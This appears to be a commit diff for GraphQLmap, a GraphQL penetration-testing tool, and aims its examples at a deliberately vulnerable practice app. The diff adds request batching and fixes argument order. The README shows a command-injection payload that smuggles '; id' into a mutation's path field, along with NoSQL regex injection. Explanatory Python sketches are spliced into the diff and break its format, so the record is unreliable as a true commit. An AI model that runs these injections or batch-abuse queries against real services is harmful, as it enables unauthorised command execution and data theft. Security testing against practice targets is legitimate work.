Fix parameters order in requester + batching queries
parent e4eeaa372a
commit 59305d7570

README.md (48 changes)
@@ -7,8 +7,8 @@
 * [Features and examples](#features-and-examples)
   - [Dump a GraphQL schema](#dump-a-graphql-schema)
   - [Interact with a GraphQL endpoint](#interact-with-a-graphql-endpoint)
-  - Execute GraphQL queries
-  - Autocomplete queries
+  - [Execute GraphQL queries](#)
+  - [Autocomplete queries](#)
   - [GraphQL field fuzzing](#graphql-field-fuzzing)
     - [Example 1 - Bruteforce a character](#example-1---bruteforce-a-character)
     - [Example 2 - Iterate over a number](#example-2---iterate-over-a-number)
@@ -46,6 +46,16 @@ optional arguments:
   --proxy [PROXY]       HTTP proxy to log requests
 ```
 
+Development setup
+
+```ps1
+python -m venv .venv
+source .venv/bin/activate
+pip install --editable .
+pip install -r requirements.txt
+./bin/graphqlmap -u http://127.0.0.1:5013/graphql
+```
+
 
 ## Features and examples
 
@@ -110,6 +120,21 @@ GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin
 }
 ```
 
+It also works with `mutations`; they must be written on a single line.
+
+```ps1
+# ./bin/graphqlmap -u http://127.0.0.1:5013/graphql --proxy http://127.0.0.1:8080 --method POST
+GraphQLmap > mutation { importPaste(host:"localhost", port:80, path:"/ ; id", scheme:"http"){ result }}
+{
+    "data": {
+        "importPaste": {
+            "result": "uid=1000(dvga) gid=1000(dvga) groups=1000(dvga)\n"
+        }
+    }
+}
+```
+
+
 ### GraphQL field fuzzing
 
 Use `GRAPHQL_INCREMENT` and `GRAPHQL_CHARSET` to fuzz a parameter.
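
A hedged sketch of what this charset fuzzing boils down to (not the tool's exact implementation; the URL, the `paste` field and the charset are illustrative placeholders): each candidate character is substituted into the query and the response length is compared, the same length-based check used by `exec_graphql(..., only_length=1)` further down in this commit.

```python
import string
import requests

# Hypothetical target and query template: "FUZZ" plays the role of GRAPHQL_CHARSET.
URL = "http://127.0.0.1:5013/graphql"
TEMPLATE = '{ paste(title: "FUZZ") {id, title, content} }'

def fuzz_charset(url, template, charset=string.ascii_letters + string.digits):
    """Substitute each candidate character and print the response length:
    an outlier length usually marks a hit."""
    for char in charset:
        query = template.replace("FUZZ", char)
        r = requests.post(url, json={"query": query}, verify=False)
        print(f"[{char}] length={len(r.text)}")

fuzz_charset(URL, TEMPLATE)
```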
@@ -168,6 +193,21 @@ GraphQLmap > { paste(pId: "9") {id,title,content,public,userAgent} }
 }
 ```
 
+### GraphQL Batching
+
+GraphQL supports request batching. Batched requests are processed one after the other by the GraphQL backend.
+Use `BATCHING_PLACEHOLDER` before a query to send it multiple times inside a single request.
+
+```ps1
+GraphQLmap > BATCHING_3 {__schema{ types{name}}}
+[+] Sending a batch of 3 queries
+[+] Successfully received 3 outputs
+
+GraphQLmap > BATCHING_2 {systemUpdate}
+[+] Sending a batch of 2 queries
+[+] Successfully received 2 outputs
+```
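
Under the hood the batch is a JSON array of query objects sent in a single POST, which is what the `requester()` change later in this commit implements. A minimal standalone sketch (the endpoint URL is a placeholder):

```python
import requests

URL = "http://127.0.0.1:5013/graphql"  # placeholder endpoint

def send_batch(url, query, count):
    """POST a JSON array of identical queries; a batching-aware backend
    returns one result object per entry in the array."""
    payload = [{"query": query} for _ in range(count)]
    r = requests.post(url, json=payload, verify=False)
    results = r.json()
    print(f"[+] Sent {count} queries, received {len(results)} outputs")
    return results

send_batch(URL, "{__schema{ types{name}}}", 3)
```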
+
 ### NoSQLi injection
 
 Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function.
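
A conceptual sketch of the blind extraction that `BLIND_PLACEHOLDER` enables, in the spirit of the `$regex` example above (an assumption-laden illustration, not the tool's `nosqli` routine; the URL, field names and length threshold are placeholders):

```python
import requests

URL = "http://127.0.0.1:5013/graphql"  # placeholder endpoint
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyz"

def oracle(url, prefix):
    """Return True when the injected $regex prefix matches, judged by response length."""
    query = ('{ doctors(options: 1, search: "{ \\"lastName\\": '
             '{ \\"$regex\\": \\"^%s\\" } }"){ firstName lastName id } }' % prefix)
    r = requests.post(url, json={"query": query}, verify=False)
    return len(r.text) > 50  # threshold depends on the target's empty-result size

def extract(url, max_len=20):
    """Grow the matched prefix one character at a time."""
    found = ""
    for _ in range(max_len):
        for c in CHARSET:
            if oracle(url, found + c):
                found += c
                break
        else:
            break
    return found

print(extract(URL))
```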
@@ -192,11 +232,11 @@ GraphQLmap > mssqli
 
 ## Practice
 
-* [Damn Vulnerable GraphQL Application - @dolevf](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application/blob/master/setup.py)
+* [Damn Vulnerable GraphQL Application - @dolevf](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application/blob/master/setup.py) : `docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dolevf/dvga`
 
 ## TODO
 
-* GraphQL Field Suggestions : Find
+* GraphQL Field Suggestions
 * Generate mutation query
 * Unit tests
 * Handle node
@@ -12,7 +12,7 @@ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 class GraphQLmap(object):
     author = "@pentest_swissky"
-    version = "1.0"
+    version = "1.1"
     endpoint = "graphql"
     method = "POST"
     args = None
@@ -71,7 +71,8 @@ class GraphQLmap(object):
                 blind_mssql(self.url, self.method, self.proxy, self.headers, self.use_json)
 
             else:
-                exec_advanced(self.url, self.method, query, self.proxy, self.headers, self.use_json)
+                print(self.headers)
+                exec_advanced(self.url, self.method, query, self.headers, self.use_json, self.proxy)
 
 
 if __name__ == "__main__":
@@ -87,10 +87,10 @@ def dump_schema(url, method, graphversion, headers, use_json, proxy):
                 print("\033[95m\t(?) mutation{" + fields['name'] + "(" + mutation_args + "){ result }}\033[0m")
 
 
-def exec_graphql(url, method, query, proxy, headers=None, use_json=False, only_length=0):
+def exec_graphql(url, method, query, proxy, headers=None, use_json=False, only_length=0, is_batch=0):
     if headers is None:
         headers = {}
-    r = requester(url, method, query, headers, use_json, proxy)
+    r = requester(url, method, query, proxy, headers=headers, use_json=use_json, is_batch=is_batch)
     try:
         graphql = r.json()
         errors = graphql.get("errors")
@@ -146,9 +146,26 @@ def exec_advanced(url, method, query, headers, use_json, proxy):
             length = exec_graphql(url, method, query.replace(pattern, str(i)), proxy, headers, use_json, only_length=1)
             print("[+] \033[92mQuery\033[0m: (\033[91m{}\033[0m) {}".format(length, query.replace(pattern, str(i))))
 
+
+    # Allow a user to send multiple queries in a single request
+    # e.g: BATCHING_3 {__schema{ types{name}}}
+    elif "BATCHING_" in query:
+        regex = re.compile("BATCHING_(\d*)")
+        match = regex.findall(query)
+        batch = int(match[0])
+        query = query.replace('BATCHING_' + match[0], '')
+        print(f"[+] Sending a batch of {batch} queries")
+        r = requester(url, "POST", query, proxy, headers, use_json, is_batch=batch)
+        output = len(r.json())
+        if output == batch:
+            print(f"[+] Successfully received {batch} outputs")
+        else:
+            print(f"[+] Backend did not send back {batch} outputs, got {output}")
+
+
     # Otherwise execute the query and display the JSON result
     else:
-        print(exec_graphql(url, method, query, proxy, headers, use_json))
+        print(exec_graphql(url, method, query, proxy, headers=headers, use_json=use_json))
 
 
 def blind_postgresql(url, method, proxy, headers, use_json):
@@ -20,17 +20,30 @@ def jq(data):
     return json.dumps(data, indent=4, sort_keys=True)
 
 
-def requester(url, method, payload, proxy, headers=None, use_json=False):
+def requester(url, method, payload, proxy, headers=None, use_json=False, is_batch=0):
     if method == "POST" or use_json:
-        data = {
-            "query": payload.replace("+", " ")
-        }
         new_headers = {} if headers is None else headers.copy()
-        new_data = data.copy()
-        if use_json:
-            new_headers['Content-Type'] = 'application/json'
-            new_data = json.dumps(data)
-        r = requests.post(url, data=new_data, verify=False, headers=new_headers, proxies=proxy)
+
+        data = None
+        if is_batch == 0:
+            data = {
+                "query": payload.replace("+", " ")
+            }
+            new_data = data.copy()
+
+            if use_json:
+                new_headers['Content-Type'] = 'application/json'
+                new_data = json.dumps(data)
+            r = requests.post(url, data=new_data, verify=False, headers=new_headers, proxies=proxy)
+
+        else:
+            data = []
+            for i in range(is_batch):
+                data.append( {"query": payload} )
+
+            r = requests.post(url, json=data, verify=False, headers=new_headers, proxies=proxy)
+
+
         if r.status_code == 500:
             print("\033[91m/!\ API didn't respond correctly to a POST method !\033[0m")
             return None
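
For context on the commit title: `requester()` takes `proxy` before `headers`, but the old call sites passed `(query, headers, use_json, proxy)` positionally, so every argument after `query` landed in the wrong parameter. A small sketch of the pitfall and the keyword-argument fix (a simplified stub, not the real function; the target URL is a placeholder):

```python
# Simplified stub with the same parameter order as utils.requester()
def requester(url, method, payload, proxy, headers=None, use_json=False, is_batch=0):
    print(f"proxy={proxy!r}  headers={headers!r}  use_json={use_json!r}")

headers = {"Authorization": "Bearer x"}
proxies = {"http": "http://127.0.0.1:8080"}

# Old positional call (as in exec_graphql before this commit):
# headers fills the proxy slot and everything after it shifts by one.
requester("http://target/graphql", "POST", "{__schema{types{name}}}", headers, False, proxies)

# Fixed call from this commit: keyword arguments pin each value to the right parameter.
requester("http://target/graphql", "POST", "{__schema{types{name}}}", proxies,
          headers=headers, use_json=False, is_batch=0)
```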